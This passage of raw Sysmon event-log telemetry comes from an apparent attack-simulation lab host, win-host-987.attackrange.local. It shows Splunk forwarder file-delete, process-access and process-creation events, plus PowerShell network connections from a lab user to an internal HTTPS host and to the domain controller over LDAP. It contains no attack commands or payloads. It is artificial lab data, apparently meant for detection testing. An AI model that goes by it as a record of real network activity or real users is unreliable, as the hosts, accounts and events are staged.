Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8D2755A1A1A5BBED9361D851F3D35FB,SHA256=281B29D4CD0FCA4D44A06025F3B65A946741B11DEA2FBEFB4518B77D37344BC2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:01.027{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=407402E06F1BA6210F4C6462277310D1,SHA256=9E7E9B757E2CC98629E60C5B257177BBBFAA29BD518EB347F1B7E4663050D2DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:02.036{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=116195EBA104CB7CA10F7E8E277D6DCF,SHA256=AF4D67EBEE7BF172E1885E16DDE86EDCC3B79781088C0BDAD2705047227C2374,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.227{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62233-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:03.403{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2CFB805E46A4BECEC06E064003BB3E7C,SHA256=25FCEB26E49655AA50523B6305F3CD8FF43EC9233ED80908623BED1DCE7C9CA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:03.053{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05AB2C39E25F30045C87ADD0A8202774,SHA256=74EA27F15DC90C01D4C480C58577FE8EB7CF4E73B3C8BDA809987402824D54B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:04.055{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04CEE5920EB9FA34911BC1EE52BF66A0,SHA256=8924031076A174D39CF29C91D4B9A8C61564E20542032C7225B04A2289363DD8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:05.101{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52FFE27678CFFB8DBA2384C39213B453,SHA256=5EAE6DADACD04E67AA6A8E07B0D2EDC8750CB4C540104AC733FE223013D32A13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:31.400{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62234-false10.0.1.12-8000- 23542300x800000000000000035129096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:06.116{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F7F5F7A88AC92C9B2DC74753FDA741A,SHA256=59868CFB4045EF4A4076E6722E03D0206BBB458EBF4DB9C7AC749A79019A271B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:07.149{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FA3CF1701E6FD2F5FEC45B24C4D9CD9,SHA256=13CB16DA693759099BAE16D5162A46334D53103FCCB5CFD1D0F5B4DB92DBD916,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:08.452{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E1FDF315C1F32D19133C3DB38EAADCE6,SHA256=974422638D6661D05EA5088F37CBFE92BA73CD7F54BCE1AA87F7E405B813862B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:08.152{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F136FF6FDF35A5FF8A97712501BEEA7,SHA256=E9F9E575EF80572F929D65CC13FBF240880FE7C0C7E86F8415A86B01BD8D4876,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:33.400{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62235-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:09.170{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1020E4C5F34C00D01BC077C3B72FC7CD,SHA256=86A7815F1DC3A8A66E262079FC47D711BE1AC32E974E1E2C98C116E67DDE4122,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.930{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8426-613A-F296-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.930{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.930{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.930{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.930{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.930{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8426-613A-F296-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.930{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8426-613A-F296-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.915{B81B27B7-8426-613A-F296-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035129112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.440{B81B27B7-8426-613A-F196-03000000C801}54365820C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.252{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8426-613A-F196-03000000C801}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.249{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.249{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.249{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.249{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.249{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8426-613A-F196-03000000C801}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.248{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8426-613A-F196-03000000C801}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.224{B81B27B7-8426-613A-F196-03000000C801}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.223{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AFB09F071BF1ED2199EF5F06B62790A,SHA256=57D739E2F0A3F7E3429C76DF9A03309D61BA41DA29006FBBF9864079F55B1B7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:11.267{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C5C16A4586798CEE323BC8C47A4FF73,SHA256=E03E3A64B972DA76C591F989DBFEBED22CB7855A0780AEDC080F1AA345CB3AA7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:11.265{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4F59DEE4083763A54CF4FA81AB8DA232,SHA256=CB1B6F2232A48302959C5DA03403487C04D5055ADF9231F1F03FE6701426868B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:11.230{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04B62B721D63929BF4E3FE319E9841FE,SHA256=7FA733E26BC404B882C12D9D6151B723596AF3121BC78A941C7CD3A1DC1F22EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:12.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63178509DAAAB943ED3C57EC229AF2CE,SHA256=E7022725E8765CD89591C59D70AE6AB28D9EC20BCA008B75D8884ADD8C5D4277,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:38.443{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62238-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 